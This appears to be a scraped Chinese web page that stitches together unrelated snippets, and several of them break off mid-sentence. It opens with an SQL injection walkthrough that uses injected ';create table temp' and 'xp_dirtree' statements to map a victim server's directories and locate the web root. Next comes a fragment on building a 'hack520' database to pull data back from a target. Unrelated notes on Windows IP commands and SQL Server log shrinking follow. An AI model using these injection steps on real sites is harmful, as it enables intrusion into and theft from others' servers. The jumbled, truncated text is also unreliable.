select * from master.dbo.sysdatabases
insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:\FCKeditor';--

1、SQL SERVER允许执行多行语句；
2、该网站能进行注入；
3、没有返回详细的错误提示信息(否则没有必要用这种方法)。

根据经验，猜疑WEB根目录的顺序是：d盘、e盘、c盘，首先我们建立一个临时表用于存放master..xp_dirtree(适合于public)生成的目录树,用以下语句：
;create table temp(dir nvarchar(255),depth varchar(255));--,该表的dir字段表示目录的名称，depth字段表示目录的

100%数据和WEB不在一块.但是从C盘看到了Inetpub文件夹.说明这数据库服务器安装了IIS.但是得不到他IP呀.怎么搞哦.简单.就用上面所说的方法搞一下.先在本机建个库先.打开查询分析器输入

create database hack520 CREATE TABLE zhu(name nvarchar(256) null);CREATE TABLE J8(id int NULL,name nvarchar(256) null);
点执行

建立了一个hack520的库名.和zhu J8两个表.zhu里面有name这一个字段.J8也放了两字段名.一个是id一个是name.好了.现在就可以开始建立连接了~~~~~~~先看一下这条SQL语句insert into ope

微软的Windows家族从Windows NT开始跨入了网络**作系统的市场，到现在的Windows 2000可以说网

络功能在逐渐的完善，在这个成长过程中Windows融入了很多其他网络**作系统的功能，可以说是借鉴而

来的，逐渐形成了一套功能完善的网络**作系统，这也是令SUN等各大公司所感觉到不服的原因，觉得不

是微软完全自给研发的东西。不过Windows2000的功能确实是很强大的，它几乎可以象Unix和Linux一样

在命令行下做很多的工作。
下面我们看一下Windows上一个可以在命令行下更改ip地址的命令，看过这个命令后大家

关于SQLSERVER中字段为自动编号类型的重置

在SQLSERVER中的语句如下：

1. truncate table tablename
2. DBCC CHECKIDENT (tablename,reseed,1)

在处理网站的时候发现删除了99%的数据库里的数据后，数据库的日志文件还是很大！
问其他人怎么也解决不了问题, 搞出个用代码来清理日志文件和压缩数据库的方法，还是比较有用的。
在SQL Server中经常遇到事务日志变大的情况，除了将数据库设置为“自动收缩”外，还可以使用SQL命令进行快速清除数据库中的事务日志，命令如下：
下面的所有 databasename 意思为 你要清除的库名
第一步：清空日志
DUMP TRANSACTION databasename WITH NO_LOG

第二步：截断事务日志
BACKUP LOG databasename WI